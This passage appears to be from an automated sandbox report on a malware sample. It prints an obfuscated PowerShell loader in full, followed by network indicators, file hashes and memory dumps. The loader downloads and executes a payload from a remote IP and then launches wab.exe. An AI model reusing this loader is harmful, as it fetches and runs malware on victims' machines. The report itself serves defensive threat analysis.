rncSmyrneaofylfotsdRob.tisiForgrunnMi faregEruptiv]Superst:carlish:F seforAAlfastrSI,kerquCsubtetaI Shark,ICraftin.TrappesGUn,appee slagmatNeoteriSPre.edet VonnierTank,gaiDiagnosnCloutingIndslag(Rhe,met$PromagiDConceptaBe.mysutOutjumpaG.cksrebnonpestaFl,ndernmiljbeskSkrigene Sal.onrPrins,sn ServieeHyposta) Platic ');Valgmenighedernes (Filbetegnelse ' K,nsta$ SvejtsgRinginelPrunabloMuskulrbU,produa Myc,lolRepatro:DesultoK Spr.ngbViolaqumleva,tka Ha.rrrnPh,laend Ove ineAdmin snKamgrss=Bugvgbl$FlokinsSUnputr nscruplenRevolutiFileredkChaunopeSt,laiprS umretnPrstindeIndkast. UnderfsPolydynuOpsamlib,hioanvs Kildret Nyttevr Cop odiDonatepnNurserygVi,flas(Acciden$StreptoBOwnnes.iSkattedfC bildol HydrogoDio trydUvilligeKimme,irGapeseenOverrepeSixtens, Se,ail$illegitPToucheerstegefei a.derivShipmenaFagbladtSkat etuSubchelnBelejr d.muletteBeskiknrFreetyevToldgrni BridecsSphenetn Femaari Rets.nnHabenalg DiphtheZinkkogrGradualsRehu.an),lasikk ');Valgmenighedernes $Kbmanden;"
C:\Windows\system32\cmd.exe
"C:\Windows\system32\cmd.exe" /c "echo %appdata%\Schenkelvigningers.sam && echo t"
C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe" "$Signe = 1;$Variabeltypes='ring';Function Filbetegnelse($Wadmels){$Sunsquall=$Wadmels.Length-$Signe;$Untailorlike='Subst'+$Variabeltypes;For( $Anaspalin=7;$Anaspalin -lt $Sunsquall;$Anaspalin+=8){$Gruttende+=$Wadmels.$Untailorlike.Invoke( $Anaspalin, $Signe);}$Gruttende;}function Valgmenighedernes($Manendes){ & ($illegalisation) ($Manendes);}$Gamasoidea=Filbetegnelse ' BabyinMJulekaloMelanchzGrou.dwiSparkpalCreptvilorpinsea Truing/Killock5Lejligh.Sekret,0Forsan, Bundga(Pul,onaWCra stviFolketinProlo,ud TyllefoHencemiw Formods Resume GenbesNSikk,rhT equiva Spystil1Decenni0,nteral.Un,esto0 Minisu;Sme.tep Pa.amanWI.doktri Stereon Sigted6Tavlesv4 notabi;Ostiate SulfofxMetabas6 rotect4Kransst;Rebokes parkgstrDrtrsklv Rrlgn :Sub,oen1Sk leel2Ovarier1 Grynte.Me,oria0Fo budd)Stan se hede skGFlonelleGammeljcCursivekEpicardoRecubat/Fanwort2Unrejec0Genrebe1Recani.0 Adspl.0Cubicit1Sanitor0Var.fys1 M zuza UnpervaFgr.mmatiRet krarForageseTrafi.ofDynamogo WhizzbxOmplace/Monticu1Avlsbru2Enla es1 Villia.Whitten0 Forjag ';$Scirrhus=Filbetegnelse 'SygesikUBr ddensurigt geGovernar iffere- D variAFo.efalg DebatpeMa.ropln Coelint ,ntikv ';$Waxingly=Filbetegnelse 'BagflikhBassangtTeskeretAktio.ipGe,give:egisrut/ bil ag/Bra.ker4Zeuneri6Papolat.Floskle1 Mis,ai8Setdown3 Beskik.Bi.ulfa2Harmoni2Fla,ell2Ensilat. Treeta1hissing5Usan sy/ MellemGGgeblomlGlobulia,ntermidGallo.alTohaandiAnatomoeVandskisSalsalatReboote.Paterepj GoldesaOcul,pavDivulsoaBulletw ';$Forduftede71=Filbetegnelse 'Ndersun> Beastl ';$illegalisation=Filbetegnelse 'Glostsdi ShyesseIndtgtsxMasedem ';$Determinacy='Indiapapir132';$Heteroclital = Filbetegnelse 'SkitsereRokni gc AliyoshProag,ioPhotofl Kle,tom% KrydsoaFlisevgpSnitsa p JewishdLand,seaB.nepsytUnreproaUdskeje% Fi,kes\Blr.rneS,rudgincCompursh M.lleme Modi,in TronadkSkattefeArsenoplM ldirevKe,nespiPinc.gug unportnAkupunki Redninn Unassig margu.eFloodprrWo.derfsPoxycot.afhoertsSkorzonaBakterimHightin Redacto&Unsatir&Partiti StavesveBeseglecHempsarhDemonstoRej ebe ViticultLt,tleb ';Valgmenighedernes (Filbetegnelse 'Tomor,o$FredningEventualOffend oErratasb Dg,insaLividitl L.eadg: PersonATipoldelSemid clKimcheeiSprightgBobbingaSss.nsttGoat,ruiVaud uxole.terlnHemmeli=Trylles(Radialgc Skuffem Mult,cd Frustr L cubra/ Tils,ecForskel Lnst.pp$ St.rneHSpydigseF renootBrem.ereTruthler .efereoLanguedc GazumplPreach iGittknitParticia Devexil Udsti )Udmejsl ');Valgmenighedernes (Filbetegnelse 'Brkjern$Pre.mblgHaandfll TistykoGonorrsbForna naIn estalIndus r: PeriphS Erodera IntercmMerostom.rfrieweAlderdonAzoficatBrandflrSystylonJordfstgRopelaynMcadam,isway,ulnVoltit.g UnbruteAl uderr Infini2Tilhold4.ortsta0Reh.ars=Vendue $BeregniWNoninc aPortionxRikardsi WeddednBu banegclawkphlTwan edyBrnevre.CoagitasDmpendep HyperdlBanuseliPl,vskrtThirtyp(Formueo$QuizsmoFkaffessoAutori rRefer idLampmanuCont,mafPar eretJordlageStandpadP lariseSy boli7Patter 1M,neant)Skubspy ');$Waxingly=$Sammentrngninger240[0];$Civilness= (Filbetegnelse 'Neakesm$Meallesg Chat ll Forl.goIsopetabHy.omoraOsteostlLaanets:NattevaINaboerslAnneroddEnecellsUnmedialBoothagu Ri gvrkTeknonyn tigmatiUnfo benEkspansgIni.uitsR,imunda.everanpBra.dhjpLatiniaaTallagervddendeaAbstinet RegioneNulletst I tercsBu.lies=Oprej,nNM mickeeTusindewRallyet-handelsOU evgelb UnflesjvemodigeCord,tecReveriftNeumann UnbendSSomniloyForken.sDidaktitBlondineHaandfumMilie,p. DobbelNKantte,eSaloonetSlilydi.TrademyW Bank,pe Ynke sbBengtenCAxonicdl utterei Poperie AmputenP eonast');$Civilness+=$Alligation[1];Valgmenighedernes ($Civilness);Valgmenighedernes (Filbetegnelse 'Unpriva$MontgolIShlumpslSingle,dUdlic,tsEdmaszel Gr tinuun,oodfkPragmatnKalced.iPapercunNona.sogBrostensDannebraI.trigepKarnevapQuantisa .ktieur D filaaTeks,edtSk tteae Internt traales Papaen.Snder,eHne,hinie Trans aTabtypedFo.mingeRoachlirAuto.obsandroph[Oplg.in$TllingeSsvrms hcEk portiUnderclrDagsprirFlejnskhTra.situSlaskedsFiskesk]Dampkog=Lam,yma$AdenytaGT.icopha.ontingm rytte.a UdvalgsAllerhjoDirtiediKbstderdStringheSt,eameaSlgtled ');$Quittances=Filbetegnelse 'Exc mmu$ lausenIGnaversltambacsd SprogssEricophlDr.lageuT.bulark Abjuncn,rooneriClubablnekspresgUntimorsB,ookliaAl,alimpUrticatpInddataaReskomprSmaavasaSkalottt Saarske Polarit TamtamsYderlig.LumredeDBrownmooAppare.wKateternAfterpilPickeltoSparttiaArseniodPalaeoeFSupersoiSoamuntl esponseMadopsk( Tennis$ attigfWAfsi,diaEc.asitxBleskudiFeltflanRecirclgSull,abl Evako.y Tropho,Conjuga$P,ioritTNode laoafregneeDeliriejCrenothllammergeMi lion)Udkastn ';$Toejle=$Alligation[0];Valgmenighedernes (Filbetegnelse 'Succurs$.epskong inealelBokseboo MastmabGliadinaJannichl .kumme:Energ bAKejtedea S.ltegn rintpddeburghsPersonraErhvervrD agemoiTungstesUncapertSu,eredo ChoanokKunstudrDatabasa Easuret sdvanliStyrtdye GendrirAs.urgenChartereFormn.n=Trichot(uricoleTSedentaePyrewins LnovertSanglrk-HrmyredPBoksehaaGruppeat PreiothOphiob Creamc$UnlawmiTSabbyunoSuperc eGa,lamijbarratrlHan,skee Lvspri) Data,e ');while (!$Aandsaristokratierne) {Valgmenighedernes (Filbetegnelse 'Semipro$Ey opengHoodooblSkuboppo PaagribSki,bruaApartadlre eren:Hjlpev.rSalthoro PhantovSgnehelfGaloisfiUmbraensNonf sskOpryknieEbbingundecolors Sutteg=Gtemnds$myc.soztstillinr,nadipsuBarrelfe erhver ') ;Valgmenighedernes $Quittances;Valgmenighedernes (Filbetegnelse 'Abs rbeSperspectPresentaKi,engerKraverstcelebra-ByggeriSHaablstlElmyskre Dichroe O.erflp av,ntg Somme g4 Pla,fo ');Valgmenighedernes (Filbetegnelse 'forldel$Inh lergpr,tochlLabionaoCarburebUnaffliaSmedejeldannels:AcosmisA opklara CottifnUniv.rsdHovedstsFaci ita Rasherrwoo.ieriTricotpsDenicottImpervioelektrok TribelrGrevskaaLyseslutVermlaniStedtileKurdishrLa.ellunAdmiraleKiselsy=Heweudl(FourierTJeo.ordeFrekvensAnnlilstPlsebrd-FrdselsPSalgsseaLinguant Or,sgnhPers.nk Gennemh$SvornefTPutredio Mispere NotidajRaastofl AcyloxeFot.alb) mprovi ') ;Valgmenighedernes (Filbetegnelse 'Lsrepa $AssistegGalpendlPolerino.uarnerbRetsviraRu kusclOverste:MilksopPAltruissEscargoerollmopuFo.trffdIngenioo,ikronea Skumslnhe hrenarelaunccSlumarbhKvaliterTotalizoHaem,stn,ungmetiAs luslsSl erpatKlorofoifo.boldcS,repor=Voltmet$Sam.enrgSkrsildl martneoRegis.ebDesc ieaUove.enlBortlic:Glam.urR FremryiEkspartcAsylre.kResurresUntolerhNutr tiasem cos+Indkoms+Trespro%Estrich$MinkfarSSulfinea En eromRe setsmSymphoneNedskrinUlrikatt OverburSy svinn Damerkg PipiesnUn.ourniWhich,onStreg,ogProgra,eBordherrAutodyn2 A,ticy4Individ0Cinnamo.uopfyldcslutbe,oBagerisuSkoleelnudkaarit S bles ') ;$Waxingly=$Sammentrngninger240[$Pseudoanachronistic];}$Bifloderne=346851;$Privatundervisningers=30771;Valgmenighedernes (Filbetegnelse 'Koksbla$Ho.gastg PrdikalMos ismo Neda vbRomantiaLineocilAgitate:BitterbtArg,ntiiDowsabemBarakkea sa,dwiu Axi ymaSeemlie Workhov=Tjrenel Aksem gG.ilbageeBall.tatE.fases-Noi,efuCTabernaoArgentin,ordgtit,illemieBarnyv,nZanettetStrbemr graphic$bonitypTunittruo Unho,iePtocholjRygeo,tlTiresomeOpkalds ');Valgmenighedernes (Filbetegnelse ' Chilen$ SelfmagufordrvlPers.ecoGoyi.rvbDil,ttaaEta lerlrv,ulle:Quin,llDf,ooeycaUnsedestEfterfla Rusernb Overdra N,nintn tvnevak InverieLubberlrVoldgifn ForgreePre,ecl Hjkultu=beregni Side.me[Mora.isSzinckenyTribunesSussysttRaanokkeSpildevm blowha.AlliancCRudderhoUn erbynDeba.tevAlst upe,ommetarSk.iftrtBlodpla]fr.mpro:Psychom:MetrumsFdikuirerTrioicooTineweemDechlorBsubterhaPrimegisSupplereEdelwei6F.ttock4RdsptteSSul,hurtSnifferr VilligiDerbyernAnonymigColesee(asympto$Busbanet AmaryliAnischumM triaraSu,rounuGrund raPrototr)Minions ');Valgmenighedernes (Filbetegnelse ' Balakk$S rychng c emosl Guessto FedesvbDe,onstaSkriverl Leache:FiremasSChondran s.enarnGripep,iUnattackp,ramideSlumpssrBo deaunOve,cone larrig Cosmopo=Kuperin Pauseme[Udvlg,lS LandinyAfdampes evlerstYppigerePh,laenmKollegi. DeprogTPeriodee .urmulxAf,rkket Overb,.Crad.ecE GrousenGraf rncSmyrneaofylfotsdRob.tisiForgrunnMi faregEruptiv]Superst:carlish:F seforAAlfastrSI,kerquCsubtetaI Shark,ICraftin.TrappesGUn,appee slagmatNeoteriSPre.edet VonnierTank,gaiDiagnosnCloutingIndslag(Rhe,met$PromagiDConceptaBe.mysutOutjumpaG.cksrebnonpestaFl,ndernmiljbeskSkrigene Sal.onrPrins,sn ServieeHyposta) Platic ');Valgmenighedernes (Filbetegnelse ' K,nsta$ SvejtsgRinginelPrunabloMuskulrbU,produa Myc,lolRepatro:DesultoK Spr.ngbViolaqumleva,tka Ha.rrrnPh,laend Ove ineAdmin snKamgrss=Bugvgbl$FlokinsSUnputr nscruplenRevolutiFileredkChaunopeSt,laiprS umretnPrstindeIndkast. UnderfsPolydynuOpsamlib,hioanvs Kildret Nyttevr Cop odiDonatepnNurserygVi,flas(Acciden$StreptoBOwnnes.iSkattedfC bildol HydrogoDio trydUvilligeKimme,irGapeseenOverrepeSixtens, Se,ail$illegitPToucheerstegefei a.derivShipmenaFagbladtSkat etuSubchelnBelejr d.muletteBeskiknrFreetyevToldgrni BridecsSphenetn Femaari Rets.nnHabenalg DiphtheZinkkogrGradualsRehu.an),lasikk ');Valgmenighedernes $Kbmanden;"
C:\Windows\SysWOW64\cmd.exe
"C:\Windows\system32\cmd.exe" /c "echo %appdata%\Schenkelvigningers.sam && echo t"
C:\Program Files (x86)\windows mail\wab.exe
"C:\Program Files (x86)\windows mail\wab.exe"
C:\Windows\SysWOW64\extrac32.exe
"C:\Windows\SysWOW64\extrac32.exe"
Network
| Country | Destination | Domain | Proto |
| LV | 46.183.222.15:80 | 46.183.222.15 | tcp |
| LV | 46.183.222.15:80 | 46.183.222.15 | tcp |
Files
C:\Users\Admin\AppData\Local\Temp\Cab676C.tmp
| MD5 | 49aebf8cbd62d92ac215b2923fb1b9f5 |
| SHA1 | 1723be06719828dda65ad804298d0431f6aff976 |
| SHA256 | b33efcb95235b98b48508e019afa4b7655e80cf071defabd8b2123fc8b29307f |
| SHA512 | bf86116b015fb56709516d686e168e7c9c68365136231cc51d0b6542ae95323a71d2c7acec84aad7dcecc2e410843f6d82a0a6d51b9acfc721a9c84fdd877b5b |
memory/2636-20-0x000007FEF643E000-0x000007FEF643F000-memory.dmp
memory/2636-21-0x000000001B110000-0x000000001B3F2000-memory.dmp
memory/2636-22-0x00000000026A0000-0x00000000026A8000-memory.dmp
memory/2636-23-0x000007FEF6180000-0x000007FEF6B1D000-memory.dmp
memory/2636-24-0x000007FEF6180000-0x000007FEF6B1D000-memory.dmp
memory/2636-25-0x000007FEF6180000-0x000007FEF6B1D000-memory.dmp
memory/2636-26-0x000007FEF6180000-0x000007FEF6B1D000-memory.dmp
memory/2636-27-0x000007FEF6180000-0x000007FEF6B1D000-memory.dmp
C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\49M9BHF86VFWLGXOAQDX.temp
| MD5 | 19f8ca6aca9eb8b8d3bce549d4a9a4d9 |
| SHA1 | d4bb7eb231fd996238bfab18ec5984afab0d68fd |
| SHA256 | 18e48a226c9057f2eed4742246a7005c331cd799da0bc4e13f801aa10d796e5c |
| SHA512 | d4e21f1b0672cfd17e5b42f6746cf7b76ac21535aff6dab5c0a8a6b511133338fa02ccfedf342a92925b9a74bf1334fbd2d66c430f0edf6f3a2a353c8bc42dda |
C:\Users\Admin\AppData\Roaming\Schenkelvigningers.sam
| MD5 | 9a68c95ad5b5da02da5f2bb483de9d76 |
| SHA1 | e555b4aad443585e6874ece154def81c7fe805e2 |
| SHA256 | 6ae7efbb0fe7f146254b0a191a5af7866754b97548cf050529e4491e0e913dbc |
| SHA512 | dd10ff9c44a790d5db6b1057cefb91564365a00a009d23129618e4a7329d4a71d3dbefc20baa5ff36e6bed037cf825a6d02433af9c59c74573415226eeaecb41 |
memory/2636-33-0x000007FEF6180000-0x000007FEF6B1D000-memory.dmp
memory/2636-34-0x000007FEF643E000-0x000007FEF643F000-memory.dmp
memory/3036-35-0x00000000060C0000-0x000000000A0D7000-memory.dmp
memory/2396-38-0x0000000000400000-0x0000000000581000-memory.dmp
memory/2636-39-0x000007FEF6180000-0x000007FEF6B1D000-memory.dmp
memory/2396-40-0x0000000000400000-0x0000000000581000-memory.dmp
memory/2396-41-0x0000000000400000-0x0000000000581000-memory.dmp
memory/2396-42-0x0000000000400000-0x0000000000581000-memory.dmp
memory/2396-43-0x0000000000400000-0x0000000000581000-memory.dmp
memory/2396-44-0x0000000000400000-0x0000000000581000-memory.dmp
memory/1308-47-0x0000000002D70000-0x0000000002E70000-memory.dmp
memory/1044-48-0x0000000000080000-0x00000000000BF000-memory.dmp
memory/2396-49-0x0000000000400000-0x0000000000581000-memory.dmp
memory/2396-50-0x0000000000400000-0x0000000000581000-memory.dmp
memory/1044-51-0x0000000000080000-0x00000000000BF000-memory.dmp